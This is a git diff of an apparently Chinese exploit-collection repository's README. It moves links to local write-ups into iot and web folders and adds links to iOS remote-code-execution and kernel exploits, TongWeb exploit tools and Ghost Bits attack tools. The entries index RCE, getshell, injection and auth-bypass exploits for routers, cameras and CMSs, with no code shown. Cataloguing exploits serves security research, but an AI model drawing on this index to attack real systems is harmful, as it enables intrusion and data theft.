diff --git a/BlueKeep/requirements.txt b/BlueKeep/requirements.txt
index 5be82196a..ef35cbd0a 100644
--- a/BlueKeep/requirements.txt
+++ b/BlueKeep/requirements.txt
@@ -1 +1 @@
-pyopenssl==19.0
\ No newline at end of file
+pyopenssl==26.0.0
\ No newline at end of file
diff --git a/README.md b/README.md
index 3e30c4b09..cfd6de62a 100644
--- a/README.md
+++ b/README.md
@@ -18,10 +18,10 @@
 
 ## <span id="head3">IOT Device&Mobile Phone</span>
 
-- [天翼创维awifi路由器存在多处未授权访问漏洞](天翼创维awifi路由器存在多处未授权访问漏洞.md)
-- [华为WS331a产品管理页面存在CSRF漏洞](华为WS331a产品管理页面存在CSRF漏洞.md)
-- [CVE-2019-16313 蜂网互联企业级路由器v4.31密码泄露漏洞](./CVE-2019-16313%20蜂网互联企业级路由器v4.31密码泄露漏洞.md)
-- [D-Link路由器RCE漏洞](./CVE-2019-16920-D-Link-rce.md)
+- [天翼创维awifi路由器存在多处未授权访问漏洞](./iot/天翼创维awifi路由器存在多处未授权访问漏洞.md)
+- [华为WS331a产品管理页面存在CSRF漏洞](./iot/华为WS331a产品管理页面存在CSRF漏洞.md)
+- [CVE-2019-16313 蜂网互联企业级路由器v4.31密码泄露漏洞](./iot/CVE-2019-16313%20蜂网互联企业级路由器v4.31密码泄露漏洞.md)
+- [D-Link路由器RCE漏洞](./iot/CVE-2019-16920-D-Link-rce.md)
 - [CVE-2019-13051-Pi-Hole路由端去广告软件的命令注入&权限提升](./CVE-2019-13051)
 - [D-Link DIR-859 - RCE UnAutenticated (CVE-2019–17621)](https://github.com/s1kr10s/D-Link-DIR-859-RCE)
 - [Huawei HG255 Directory Traversal[目录穿越]](https://packetstormsecurity.com/files/155954/huaweihg255-traversal.rb.txt)|[本地备份文件](./tools/huaweihg255-traversal.rb)
@@ -30,20 +30,21 @@
 - [小米系列路由器远程命令执行漏洞（CVE-2019-18370，CVE-2019-18371）](https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/report/report.md)
 - [Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload-未经验证即可替换固件)](https://www.exploit-db.com/exploits/48158)
 - [cve-2020-8634&cve-2020-8635](https://www.exploit-db.com/exploits/48160)|[Wing FTP Server 6.2.3权限提升漏洞发现分析复现过程](https://www.hooperlabs.xyz/disclosures/cve-2020-8635.php)|[Wing FTP Server 6.2.5权限提升](https://www.exploit-db.com/exploits/48154)
-- [CVE-2020-9374-TP LINK TL-WR849N - RCE](./CVE-2020-9374.md)
+- [CVE-2020-9374-TP LINK TL-WR849N - RCE](./iot/CVE-2020-9374.md)
 - [CVE-2020-12753-LG 智能手机任意代码执行漏洞](https://github.com/shinyquagsire23/CVE-2020-12753-PoC)
 - [CVE-2020-12695-UPnP 安全漏洞](https://github.com/yunuscadirci/CallStranger)
 - [79款 Netgear 路由器遭远程接管0day](https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.06.15-netgear/exploit.py)
 - [dlink-dir610-exploits-Exploits for CVE-2020-9376 and CVE-2020-9377](https://github.com/renatoalencar/dlink-dir610-exploits)
 - [wacker：一组脚本，可辅助对WPA3接入点执行在线词典攻击](https://github.com/blunderbuss-wctf/wacker)
 - [CVE-2020-24581 D-Link DSL-2888A 远程命令执行漏洞分析](./books/CVE-2020-24581%20D-Link%20DSL-2888A%20远程命令执行漏洞分析.pdf)-[原地址](https://www.anquanke.com/post/id/229323)
-- [CNVD-2021-14536_锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露漏洞](./CNVD-2021-14536_锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露漏洞.md)
+- [CNVD-2021-14536_锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露漏洞](./iot/CNVD-2021-14536_锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露漏洞.md)
 - [CNVD-2021-14544:Hikvision 海康威视流媒体管理服务器任意文件读取](https://github.com/Henry4E36/Hikvision)
 - [CNVD-2020-25078:D-link 敏感信息泄漏，可以直接获取账户密码查看监控](https://github.com/Henry4E36/D-link-information)
 - [ios-gamed-0day](https://github.com/illusionofchaos/ios-gamed-0day)
 - [ios-nehelper-wifi-info-0day](https://github.com/illusionofchaos/ios-nehelper-wifi-info-0day)
 - [ios-nehelper-enum-apps-0day](https://github.com/illusionofchaos/ios-nehelper-enum-apps-0day)
 - [iOS 15.0.1 RCE PoC](https://github.com/jonathandata1/ios_15_rce)
+- [DarkSword-RCE：Apple iOS 远程代码执行漏洞利用](https://github.com/htimesnine/DarkSword-RCE)|[darksword-kexploit：Apple iOS 内核漏洞利用](https://github.com/opa334/darksword-kexploit)|[DarkSword：Apple iOS 漏洞利用](https://github.com/ghh-jb/DarkSword)
 - [CVE-2021-36260：海康威视产品命令注入漏洞](https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html)
 - [CVE-2021-33044、CVE-2021-33045 大华摄像头POC](https://github.com/mcw0/DahuaConsole)|[相关分析](https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt)|[登录绕过chrome 插件](https://github.com/bp2008/DahuaLoginBypass)
 - [CVE-2021-36260：海康威视命令注入漏洞](https://github.com/rabbitsafe/CVE-2021-36260)|[又一个CVE-2021-36260利用脚本](https://github.com/Cuerz/CVE-2021-36260)
@@ -59,7 +60,7 @@
 - [IOT_vuln：IOT相关漏洞仓库](https://github.com/EPhaha/IOT_vuln)
 - [hikvision_CVE-2017-7921_auth_bypass_config_decryptor：解密受CVE-2017-7921影响的海康威视的配置文件](https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor)
 - [CVE-2022-20866：思科自适应安全设备软件和 Firepower 威胁防御软件 RSA 私钥泄漏检查](https://github.com/CiscoPSIRT/CVE-2022-20866)
-- [WLAN-AP-WEA453e RCE:三星路由器远程命令执行漏洞](./WLAN-AP-WEA453e%20RCE三星路由器远程命令执行漏洞.md)
+- [WLAN-AP-WEA453e RCE:三星路由器远程命令执行漏洞](./iot/WLAN-AP-WEA453e%20RCE三星路由器远程命令执行漏洞.md)
 - [Buffer overflow in Xiongmai DVRs](https://blog.ret2.me/post/2022-01-26-exploiting-xiongmai-dvrs/)|[备份](https://web.archive.org/web/20221129205148/https://blog.ret2.me/post/2022-01-26-exploiting-xiongmai-dvrs/)
 - [CVE-2023-27350: PaperCut NG身份验证绕过导致的RCE](https://github.com/horizon3ai/CVE-2023-27350)
 - [ivms-8700-0day-poc: 海康威视iVMS-8700综合安防管理平台任意文件上传漏洞](https://github.com/spmonkey/ivms-8700-0day-poc)
@@ -80,41 +81,48 @@
 - [从jhttpd分析到系统命令注入(CVE-2021-46227-D-Link Di-7200G 命令注入漏洞)](./books/从jhttpd分析到系统命令注入(CVE-2021-46227-D-Link%20Di-7200G%20命令注入漏洞).html)
 - [2024 RWCTF群晖 BC500摄像头RCE--未授权_栈溢出](./books/2024%20RWCTF群晖%20BC500摄像头RCE--未授权_栈溢出.html)
 - [路由器dd手动提取固件---迅捷PoEAC路由一体机FR100P-AC固件提取](./books/路由器dd手动提取固件---迅捷PoEAC路由一体机FR100P-AC固件提取.html)
+- [NX_Firmware：任天堂Switch各版本固件数据库](https://github.com/THZoria/NX_Firmware)
+- [vphone-aio：一键运行已越狱并安装完整bootstrap的iOS虚拟手机(vphone)脚本](https://github.com/34306/vphone-aio)
+- [AssppJailbroken：一款用于解密从 App Store 下载的最新 IPA 文件的工具，并支持在已越狱的 iOS 设备及 iPhone 模拟器上运行](https://github.com/lbr77/AssppJailbroken)
+- [FirmWire：支持三星 Shannon 和 MediaTek 基带固件的全系统动态分析平台，可用于模糊测试、漏洞根因分析与调试](https://github.com/FirmWire/FirmWire)
+- [Podroid：无需 root 即可在 Android 手机上运行 Linux 容器，基于 QEMU 启动 Alpine Linux 虚拟机并提供完整的 Podman 容器运行时](https://github.com/ExTV/Podroid)
+- [PrismSpace：基于 Android 工作资料（managed profile）的应用双开管理器](https://github.com/yzddmr6/PrismSpace)
+- [Tsec-Salon：腾讯安全沙龙历届活动材料](https://github.com/Yeti-791/Tsec-Salon)|[BLACKHAT_Asia2026: Black Hat Asia 2026 议题资料汇总](https://github.com/Mr-xn/BLACKHAT_Asia2026)|[Java Ghost Bits - Black Hat Asia 2026 演讲PDF(幽灵比特位:高位截断)](https://i.blackhat.com/Asia-26/Presentations/Asia-26-Bai-Cast-Attack-Ghost-Bits-4.23.pdf)|[GBitsTools: Ghost Bits攻击工具(Python GUI/CLI)](https://github.com/shiyeshu/GBitsTools)|[GbitsGen: Ghost Bits字符生成工具](https://github.com/qi4L/GbitsGen)|[ghost-bits-lab: Ghost Bits交互式安全实验靶机(Java)](https://github.com/Xc1Ym/ghost-bits-lab)
 
 ## <span id="head4">Web APP</span>
 
-- [致远OA_A8_getshell_0day](致远OA_A8_getshell_0day.md)
-- [Couch through 2.0存在路径泄露漏洞 ](Couch%20through%202.0存在路径泄露漏洞.md)
-- [Cobub Razor 0.7.2存在跨站请求伪造漏洞](Cobub%20Razor%200.7.2存在跨站请求伪造漏洞.md)
-- [joyplus-cms 1.6.0存在CSRF漏洞可增加管理员账户](joyplus-cms%201.6.0存在CSRF漏洞可增加管理员账户.md)
-- [MiniCMS 1.10存在CSRF漏洞可增加管理员账户](MiniCMS%201.10存在CSRF漏洞可增加管理员账户.md)
-- [Z-Blog 1.5.1.1740存在XSS漏洞](Z-Blog%201.5.1.1740存在XSS漏洞.md)
-- [YzmCMS 3.6存在XSS漏洞](YzmCMS%203.6存在XSS漏洞.md)
-- [Cobub Razor 0.7.2越权增加管理员账户](Cobub%20Razor%200.7.2越权增加管理员账户.md)
-- [Cobub Razor 0.8.0存在SQL注入漏洞](Cobub%20Razor%200.8.0存在SQL注入漏洞.md)
-- [Cobub Razor 0.8.0存在物理路径泄露漏洞](Cobub%20Razor%200.8.0存在物理路径泄露漏洞.md)
-- [五指CMS 4.1.0存在CSRF漏洞可增加管理员账户](五指CMS%204.1.0存在CSRF漏洞可增加管理员账户.md)
-- [DomainMod的XSS集合](DomainMod的XSS集合.md)
-- [GreenCMS v2.3.0603存在CSRF漏洞可获取webshell&增加管理员账户](GreenCMS%20v2.3.0603存在CSRF漏洞可获取webshell&增加管理员账户.md)
-- [yii2-statemachine v2.x.x存在XSS漏洞](yii2-statemachine%20v2.x.x存在XSS漏洞.md)
-- [maccms_v10存在CSRF漏洞可增加任意账号](maccms_v10存在CSRF漏洞可增加任意账号.md)
-- [LFCMS 3.7.0存在CSRF漏洞可添加任意用户账户或任意管理员账户](LFCMS%203.7.0存在CSRF漏洞可添加任意用户账户或任意管理员账户.md)
-- [Finecms_v5.4存在CSRF漏洞可修改管理员账户密码](Finecms_v5.4存在CSRF漏洞可修改管理员账户密码.md)
+- [致远OA_A8_getshell_0day](./web/致远OA_A8_getshell_0day.md)
+- [Couch through 2.0存在路径泄露漏洞 ](./web/Couch%20through%202.0存在路径泄露漏洞.md)
+- [Cobub Razor 0.7.2存在跨站请求伪造漏洞](./web/Cobub%20Razor%200.7.2存在跨站请求伪造漏洞.md)
+- [joyplus-cms 1.6.0存在CSRF漏洞可增加管理员账户](./web/joyplus-cms%201.6.0存在CSRF漏洞可增加管理员账户.md)
+- [MiniCMS 1.10存在CSRF漏洞可增加管理员账户](./web/MiniCMS%201.10存在CSRF漏洞可增加管理员账户.md)
+- [Z-Blog 1.5.1.1740存在XSS漏洞](./web/Z-Blog%201.5.1.1740存在XSS漏洞.md)
+- [YzmCMS 3.6存在XSS漏洞](./web/YzmCMS%203.6存在XSS漏洞.md)
+- [Cobub Razor 0.7.2越权增加管理员账户](./web/Cobub%20Razor%200.7.2越权增加管理员账户.md)
+- [Cobub Razor 0.8.0存在SQL注入漏洞](./web/Cobub%20Razor%200.8.0存在SQL注入漏洞.md)
+- [Cobub Razor 0.8.0存在物理路径泄露漏洞](./web/Cobub%20Razor%200.8.0存在物理路径泄露漏洞.md)
+- [五指CMS 4.1.0存在CSRF漏洞可增加管理员账户](./web/五指CMS%204.1.0存在CSRF漏洞可增加管理员账户.md)
+- [DomainMod的XSS集合](./web/DomainMod的XSS集合.md)
+- [GreenCMS v2.3.0603存在CSRF漏洞可获取webshell&增加管理员账户](./web/GreenCMS%20v2.3.0603存在CSRF漏洞可获取webshell&增加管理员账户.md)
+- [yii2-statemachine v2.x.x存在XSS漏洞](./web/yii2-statemachine%20v2.x.x存在XSS漏洞.md)
+- [maccms_v10存在CSRF漏洞可增加任意账号](./web/maccms_v10存在CSRF漏洞可增加任意账号.md)
+- [LFCMS 3.7.0存在CSRF漏洞可添加任意用户账户或任意管理员账户](./web/LFCMS%203.7.0存在CSRF漏洞可添加任意用户账户或任意管理员账户.md)
+- [Finecms_v5.4存在CSRF漏洞可修改管理员账户密码](./web/Finecms_v5.4存在CSRF漏洞可修改管理员账户密码.md)
 - [Amazon Kindle Fire HD (3rd Generation)内核驱动拒绝服务漏洞](Amazon%20Kindle%20Fire%20HD%20\(3rd%20Generation\)内核驱动拒绝服务漏洞.md)
-- [Metinfo-6.1.2版本存在XSS漏洞&SQL注入漏洞](Metinfo-6.1.2版本存在XSS漏洞&SQL注入漏洞.md)
-- [Hucart cms v5.7.4 CSRF漏洞可任意增加管理员账号](Hucart%20cms%20v5.7.4%20CSRF漏洞可任意增加管理员账号.md)
-- [indexhibit cms v2.1.5 直接编辑php文件getshell](indexhibit%20cms%20v2.1.5%20直接编辑php文件getshell.md)
-- [S-CMS企业建站系统PHP版v3.0后台存在CSRF可添加管理员权限账号](S-CMS企业建站系统PHP版v3.0后台存在CSRF可添加管理员权限账号.md)
-- [S-CMS PHP v3.0存在SQL注入漏洞](S-CMS%20PHP%20v3.0存在SQL注入漏洞.md)
-- [MetInfoCMS 5.X版本GETSHELL漏洞合集](MetInfoCMS%205.X版本GETSHELL漏洞合集.md)
+- [Metinfo-6.1.2版本存在XSS漏洞&SQL注入漏洞](./web/Metinfo-6.1.2版本存在XSS漏洞&SQL注入漏洞.md)
+- [Hucart cms v5.7.4 CSRF漏洞可任意增加管理员账号](./web/Hucart%20cms%20v5.7.4%20CSRF漏洞可任意增加管理员账号.md)
+- [indexhibit cms v2.1.5 直接编辑php文件getshell](./web/indexhibit%20cms%20v2.1.5%20直接编辑php文件getshell.md)
+- [S-CMS企业建站系统PHP版v3.0后台存在CSRF可添加管理员权限账号](./web/S-CMS企业建站系统PHP版v3.0后台存在CSRF可添加管理员权限账号.md)
+- [S-CMS PHP v3.0存在SQL注入漏洞](./web/S-CMS%20PHP%20v3.0存在SQL注入漏洞.md)
+- [MetInfoCMS 5.X版本GETSHELL漏洞合集](./web/MetInfoCMS%205.X版本GETSHELL漏洞合集.md)
 - [MetInfo7.5.0代码审计(后台SQL注入+md5弱类型比较).pdf](./books/MetInfo7.5.0代码审计(后台SQL注入+md5弱类型比较).pdf)
 - [discuz ml RCE 漏洞检测工具](discuz-ml-rce/README.md)
-- [thinkphp5框架缺陷导致远程代码执行](thinkphp5框架缺陷导致远程代码执行.md)
-- [FineCMS_v5.0.8两处getshell](FineCMS_v5.0.8两处getshell.md)
+- [thinkphp5框架缺陷导致远程代码执行](./web/thinkphp5框架缺陷导致远程代码执行.md)
+- [FineCMS_v5.0.8两处getshell](./web/FineCMS_v5.0.8两处getshell.md)
 - [Struts2_045漏洞批量检测|搜索引擎采集扫描](Struts2_045-Poc)
-- [thinkphp5命令执行](thinkphp5命令执行.md)
-- [typecho反序列化漏洞](typecho反序列化漏洞.md)
-- [CVE-2019-10173 Xstream 1.4.10版本远程代码执行](CVE-2019-10173%20Xstream%201.4.10版本远程代码执行漏洞.md)
+- [thinkphp5命令执行](./web/thinkphp5命令执行.md)
+- [typecho反序列化漏洞](./web/typecho反序列化漏洞.md)
+- [CVE-2019-10173 Xstream 1.4.10版本远程代码执行](./web/CVE-2019-10173%20Xstream%201.4.10版本远程代码执行漏洞.md)
 - [IIS/CVE-2017-7269-Echo-PoC](./IIS/CVE-2017-7269-Echo-PoC)
 - [CVE-2019-15107 Webmin RCE](./CVE-2019-15107)
 - [thinkphp5 rce漏洞检测工具](./tp5-getshell)
@@ -127,43 +135,44 @@
 - [生成Redis恶意模块so文件配合主从复制RCE达到命令执行](https://github.com/n0b0dyCN/RedisModules-ExecuteCommand)|[相关文章](https://www.freebuf.com/vuls/224235.html)
 - [RedisWriteFile-通过 `Redis` 主从写出无损文件，可用于 `Windows` 平台下写出无损的 `EXE`、`DLL`、 `LNK` 和 `Linux` 下的 `OS` 等二进制文件](https://github.com/r35tart/RedisWriteFile)
 - [WeblogicScanLot系列，Weblogic漏洞批量检测工具](./WeblogicScanLot)
+- [TongWeb EJB 利用与插件工具](https://github.com/Axyanzzzz/TongWebEJBExploit) | [TongwebPlugin](https://github.com/Gary-yang1/TongwebPlugin)
 - [jboss_CVE-2017-12149](./jboss_CVE-2017-12149)
 - [Wordpress的拒绝服务（DoS）-CVE-2018-6389](./CVE-2018-6389)
 - [Webmin Remote Code Execution (authenticated)-CVE-2019-15642](https://github.com/jas502n/CVE-2019-15642)
-- [CVE-2019-16131 OKLite v1.2.25 任意文件上传漏洞](./CVE-2019-16131%20OKLite%20v1.2.25%20任意文件上传漏洞.md)
-- [CVE-2019-16132 OKLite v1.2.25 存在任意文件删除漏洞](./CVE-2019-16132%20OKLite%20v1.2.25%20存在任意文件删除漏洞.md)
-- [CVE-2019-16309 FlameCMS 3.3.5 后台登录处存在sql注入漏洞](./CVE-2019-16309%20FlameCMS%203.3.5%20后台登录处存在sql注入漏洞.md)
-- [CVE-2019-16314 indexhibit cms v2.1.5 存在重装并导致getshell](./CVE-2019-16314%20indexhibit%20cms%20v2.1.5%20存在重装并导致getshell.md)
-- [泛微OA管理系统RCE漏洞利用脚本](./泛微OA管理系统RCE漏洞利用脚本.md)
-- [CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit](./CVE-2019-16759%20vBulletin%205.x%200day%20pre-auth%20RCE%20exploit.md)
+- [CVE-2019-16131 OKLite v1.2.25 任意文件上传漏洞](./web/CVE-2019-16131%20OKLite%20v1.2.25%20任意文件上传漏洞.md)
+- [CVE-2019-16132 OKLite v1.2.25 存在任意文件删除漏洞](./web/CVE-2019-16132%20OKLite%20v1.2.25%20存在任意文件删除漏洞.md)
+- [CVE-2019-16309 FlameCMS 3.3.5 后台登录处存在sql注入漏洞](./web/CVE-2019-16309%20FlameCMS%203.3.5%20后台登录处存在sql注入漏洞.md)
+- [CVE-2019-16314 indexhibit cms v2.1.5 存在重装并导致getshell](./web/CVE-2019-16314%20indexhibit%20cms%20v2.1.5%20存在重装并导致getshell.md)
+- [泛微OA管理系统RCE漏洞利用脚本](./web/泛微OA管理系统RCE漏洞利用脚本.md)
+- [CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit](./web/CVE-2019-16759%20vBulletin%205.x%200day%20pre-auth%20RCE%20exploit.md)
 - [zentao-getshell 禅道8.2 - 9.2.1前台Getshell](./zentao-getshell)
-- [泛微 e-cology OA 前台SQL注入漏洞](./泛微%20e-cology%20OA%20前台SQL注入漏洞.md)
-- [Joomla-3.4.6-RCE](./Joomla-3.4.6-RCE.md)
-- [Easy File Sharing Web Server 7.2 - GET 缓冲区溢出 (SEH)](./Easy%20File%20Sharing%20Web%20Server%207.2%20-%20GET%20缓冲区溢出%20(SEH).md)
-- [构建ASMX绕过限制WAF达到命令执行(适用于ASP.NET环境)](./构建ASMX绕过限制WAF达到命令执行.md)
-- [CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass](./CVE-2019-17662-ThinVNC%201.0b1%20-%20Authentication%20Bypass.md)
-- [CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd](./CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd.md)
+- [泛微 e-cology OA 前台SQL注入漏洞](./web/泛微%20e-cology%20OA%20前台SQL注入漏洞.md)
+- [Joomla-3.4.6-RCE](./web/Joomla-3.4.6-RCE.md)
+- [Easy File Sharing Web Server 7.2 - GET 缓冲区溢出 (SEH)](./web/Easy%20File%20Sharing%20Web%20Server%207.2%20-%20GET%20缓冲区溢出%20(SEH).md)
+- [构建ASMX绕过限制WAF达到命令执行(适用于ASP.NET环境)](./web/构建ASMX绕过限制WAF达到命令执行.md)
+- [CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass](./web/CVE-2019-17662-ThinVNC%201.0b1%20-%20Authentication%20Bypass.md)
+- [CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd](./web/CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd.md)
 - [CVE-2019-11043-PHP远程代码执行漏](./CVE-2019-11043)
-- [ThinkCMF漏洞全集和](./ThinkCMF漏洞全集和.md)
-- [CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行](./CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行.md)
+- [ThinkCMF漏洞全集和](./web/ThinkCMF漏洞全集和.md)
+- [CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行](./web/CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行.md)
 - [ecologyExp.jar-泛微ecology OA系统数据库配置文件读取](./tools/ecologyExp.jar)
-- [freeFTP1.0.8-'PASS'远程缓冲区溢出](./freeFTP1.0.8-'PASS'远程缓冲区溢出.md)
-- [rConfig v3.9.2 RCE漏洞](./rConfig%20v3.9.2%20RCE漏洞.md)
-- [apache_solr_rce](./solr_rce.md)
-- [CVE-2019-7580 thinkcmf-5.0.190111后台任意文件写入导致的代码执行](CVE-2019-7580%20thinkcmf-5.0.190111后台任意文件写入导致的代码执行.md)
+- [freeFTP1.0.8-'PASS'远程缓冲区溢出](./web/freeFTP1.0.8-'PASS'远程缓冲区溢出.md)
+- [rConfig v3.9.2 RCE漏洞](./web/rConfig%20v3.9.2%20RCE漏洞.md)
+- [apache_solr_rce](./web/solr_rce.md)
+- [CVE-2019-7580 thinkcmf-5.0.190111后台任意文件写入导致的代码执行](./web/CVE-2019-7580%20thinkcmf-5.0.190111后台任意文件写入导致的代码执行.md)
 - [Apache Flink任意Jar包上传导致远程代码执行](https://github.com/LandGrey/flink-unauth-rce)
 - [Jwt_Tool - 用于验证、伪造、扫描和篡改 JWT（JSON Web 令牌）](https://github.com/ticarpi/jwt_tool)
-- [cve-2019-17424 nipper-ng_0.11.10-Remote_Buffer_Overflow远程缓冲区溢出附PoC](cve-2019-17424%20nipper-ng_0.11.10-Remote_Buffer_Overflow远程缓冲区溢出附PoC.md)
+- [cve-2019-17424 nipper-ng_0.11.10-Remote_Buffer_Overflow远程缓冲区溢出附PoC](./web/cve-2019-17424%20nipper-ng_0.11.10-Remote_Buffer_Overflow远程缓冲区溢出附PoC.md)
 - [CVE-2019-12409_Apache_Solr RCE](https://github.com/jas502n/CVE-2019-12409)
 - [Shiro RCE (Padding Oracle Attack)](https://github.com/wuppp/shiro_rce_exp)
 - [CVE-2019-19634-class.upload.php <= 2.0.4任意文件上传](https://github.com/jra89/CVE-2019-19634)
-- [Apache Solr RCE via Velocity Template Injection](./Apache%20Solr%20RCE%20via%20Velocity%20Template%20Injection.md)
+- [Apache Solr RCE via Velocity Template Injection](./web/Apache%20Solr%20RCE%20via%20Velocity%20Template%20Injection.md)
 - [CVE-2019-10758-mongo-express before 0.54.0 is vulnerable to Remote Code Execution ](https://github.com/masahiro331/CVE-2019-10758/)
 - [CVE-2019-2107-Android播放视频-RCE-POC(Android 7.0版本，7.1.1版本，7.1.2版本，8.0版本，8.1版本，9.0版本)](https://github.com/marcinguy/CVE-2019-2107)
 - [CVE-2019-19844-Django重置密码漏洞(受影响版本:Django master branch,Django 3.0,Django 2.2,Django 1.11)](https://github.com/ryu22e/django_cve_2019_19844_poc/)
 - [CVE-2019-17556-unsafe-deserialization-in-apache-olingo(Apache Olingo反序列化漏洞，影响: 4.0.0版本至4.6.0版本)](https://medium.com/bugbountywriteup/cve-2019-17556-unsafe-deserialization-in-apache-olingo-8ebb41b66817)
-- [ZZCMS201910 SQL Injections](./ZZCMS201910%20SQL%20Injections.md)|[ZZCMS201910代码审计](./books/ZZCMS201910代码审计.pdf)
-- [WDJACMS1.5.2模板注入漏洞](./WDJACMS1.5.2模板注入漏洞.md)
+- [ZZCMS201910 SQL Injections](./web/ZZCMS201910%20SQL%20Injections.md)|[ZZCMS201910代码审计](./books/ZZCMS201910代码审计.pdf)
+- [WDJACMS1.5.2模板注入漏洞](./web/WDJACMS1.5.2模板注入漏洞.md)
 - [CVE-2019-19781-Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway](https://github.com/projectzeroindia/CVE-2019-19781)
 - [CVE-2019-19781.nse---use Nmap check  Citrix ADC Remote Code Execution](https://github.com/cyberstruggle/DeltaGroup/tree/master/CVE-2019-19781)
 - [Mysql Client 任意文件读取攻击链拓展](https://paper.seebug.org/1112/)
@@ -185,28 +194,28 @@
 - [YzmCMS 5.4 后台getshell](https://xz.aliyun.com/t/7231)
 - 关于Ghostcat(幽灵猫CVE-2020-1938漏洞)：[CNVD-2020-10487(CVE-2020-1938), tomcat ajp 文件读取漏洞poc](https://github.com/nibiwodong/CNVD-2020-10487-Tomcat-ajp-POC)|[Java版本POC](https://github.com/0nise/CVE-2020-1938)|[Tomcat-Ajp协议文件读取漏洞](https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/)|[又一个python版本CVE-2020-1938漏洞检测](https://github.com/xindongzhuaizhuai/CVE-2020-1938)|[CVE-2020-1938-漏洞复现环境及EXP](https://github.com/laolisafe/CVE-2020-1938)
 - [CVE-2020-8840：Jackson-databind远程命令执行漏洞（或影响fastjson）](https://github.com/jas502n/CVE-2020-8840)
-- [CVE-2020-8813-Cacti v1.2.8 RCE远程代码执行 EXP以及分析（需要认证/或开启访客即可不需要登录）(一款Linux是基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具)](https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/)|[EXP](./CVE-2020-8813%20-%20Cacti%20v1.2.8%20RCE.md)|[CVE-2020-8813MSF利用脚本](https://www.exploit-db.com/exploits/48159)
+- [CVE-2020-8813-Cacti v1.2.8 RCE远程代码执行 EXP以及分析（需要认证/或开启访客即可不需要登录）(一款Linux是基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具)](https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/)|[EXP](./web/CVE-2020-8813%20-%20Cacti%20v1.2.8%20RCE.md)|[CVE-2020-8813MSF利用脚本](https://www.exploit-db.com/exploits/48159)
 - [CVE-2020-7246-PHP项目管理系统qdPM< 9.1 RCE](https://www.exploit-db.com/exploits/48146)
 - [CVE-2020-9547：FasterXML/jackson-databind 远程代码执行漏洞](https://github.com/fairyming/CVE-2020-9547)
 - [CVE-2020-9548：FasterXML/jackson-databind 远程代码执行漏洞](https://github.com/fairyming/CVE-2020-9548)
 - [Apache ActiveMQ 5.11.1目录遍历/ Shell上传](https://cxsecurity.com/issue/WLB-2020030033)
 - [CVE-2020-2555：WebLogic RCE漏洞POC](https://mp.weixin.qq.com/s/Wq6Fu-NlK8lzofLds8_zoA)|[CVE-2020-2555-Weblogic com.tangosol.util.extractor.ReflectionExtractor RCE](https://github.com/Y4er/CVE-2020-2555)
 - [CVE-2020-1947-Apache ShardingSphere UI YAML解析远程代码执行漏洞](https://github.com/jas502n/CVE-2020-1947)
-- [CVE-2020-0554：phpMyAdmin后台SQL注入](./CVE-2020-0554：phpMyAdmin后台SQL注入.md)
-- [泛微E-Mobile Ognl 表达式注入](./泛微e-mobile%20ognl注入.md)|[表达式注入.pdf](./books/表达式注入.pdf)
+- [CVE-2020-0554：phpMyAdmin后台SQL注入](./web/CVE-2020-0554：phpMyAdmin后台SQL注入.md)
+- [泛微E-Mobile Ognl 表达式注入](./web/泛微e-mobile%20ognl注入.md)|[表达式注入.pdf](./books/表达式注入.pdf)
 - [泛微10前台上传 getshell](https://github.com/west9b/Weaver/tree/7130bc856cf8b5cbc739a7934cdc01872f4107f3)|[Python 版本 getshell](https://github.com/gglvv/2022hvv-eoffice10-getshell)
 - [通达OA RCE漏洞](https://github.com/fuhei/tongda_rce)|[通达OAv11.6版本RCE复现分析+EXP](./books/通达OAv11.6版本漏洞复现分析.pdf)-[EXP下载](./tools/通达OA_v11.6_RCE_EXP.py)
 - [CVE-2020-10673-jackson-databind JNDI注入导致远程代码执行](https://github.com/0nise/vuldebug)
 - [CVE-2020-10199、CVE-2020-10204漏洞一键检测工具，图形化界面（Sonatype Nexus <3.21.1）](https://github.com/magicming200/CVE-2020-10199_CVE-2020-10204)
 - [CVE-2020-2555-Oracle Coherence 反序列化漏洞](https://github.com/wsfengfan/CVE-2020-2555)|[分析文章](https://paper.seebug.org/1141/)
 - [cve-2020-5260-Git凭证泄露漏洞](https://github.com/brompwnie/cve-2020-5260)
-- [通达OA前台任意用户伪造登录漏洞批量检测](./通达OA前台任意用户伪造登录漏洞批量检测.md)
+- [通达OA前台任意用户伪造登录漏洞批量检测](./web/通达OA前台任意用户伪造登录漏洞批量检测.md)
 - [CVE-2020-11890 JoomlaRCE <3.9.17  远程命令执行漏洞(需要有效的账号密码)](https://github.com/HoangKien1020/CVE-2020-11890)
 - [CVE-2020-10238【JoomlaRCE <= 3.9.15 远程命令执行漏洞(需要有效的账号密码)】&CVE-2020-10239【JoomlaRCE 3.7.0 to 3.9.15 远程命令执行漏洞(需要有效的账号密码)】](https://github.com/HoangKien1020/CVE-2020-10238)
